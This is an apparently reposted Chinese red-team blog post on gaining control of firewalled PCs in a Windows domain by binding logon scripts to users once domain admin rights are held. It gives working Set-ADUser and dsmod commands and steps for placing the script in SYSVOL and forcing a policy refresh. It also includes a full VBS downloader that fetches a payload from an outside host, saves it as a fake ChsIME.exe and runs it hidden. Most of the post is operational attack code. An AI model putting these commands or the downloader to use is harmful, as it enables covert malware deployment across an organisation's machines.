0x1、利用场景
当获取到域控权限或domain admin等高权限时,想横向到域内PC主机上对方开启了防火墙,无法通过445、135进行横向利用,可以通过登录脚本绑定的方式获取目标主机权限。
0x2、利用方法
方法一、powershell win2012及以上自带,获取当前域用户信息
Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8
绑定指定用户
Set-ADUser -Identity zhangsan -ScriptPath "download.vbs"
解绑
Set-ADUser -Identity zhangsan -ScriptPath " "
方法二、利用dsmod进行绑定
dsmod user -loscr "download.vbs" "CN=john,CN=Users,DC=redteam,DC=com"
解绑
dsmod user -loscr "" "CN=john,CN=Users,DC=redteam,DC=com"
刷新组策略
shell gpupdate /force
VBS内容
strFileURL = "http://192.168.172.129:82/logo.ico" strHDLocation = "C:\Users\Public\Documents\ChsIME.exe" Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open "GET", strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 1 'adTypeBinary objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0'Set the stream position to the start Set objFSO = Createobject("Scripting.FileSystemObject") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing strComputer = "." set ws=wscript.createobject("wscript.shell") val=ws.run ("C:\Users\Public\Documents\ChsIME.exe",0)
上传至dc c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\目录下,通过方法一或方法二进行绑定后刷新组策略即可
参考文章
https://rcoil.me/2018/11/%E3%80%90%E5%9F%9F%E6%B8%97%E9%80%8F%E3%80%91%E5%9C%A8%E5%9F%9F%E6%8E%A7%E4%B8%8A%E4%BD%BF%E7%94%A8cmd%E6%9B%B4%E6%94%B9%E5%9F%9F%E7%94%A8%E6%88%B7%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84%E7%99%BB%E5%BD%95%E8%84%9A%E6%9C%AC/
标签:objXMLHTTP,9F%,Set,登录,渗透,objADOStream,E6%,E7%,下发 From: https://www.cnblogs.com/websecyw/p/16657762.html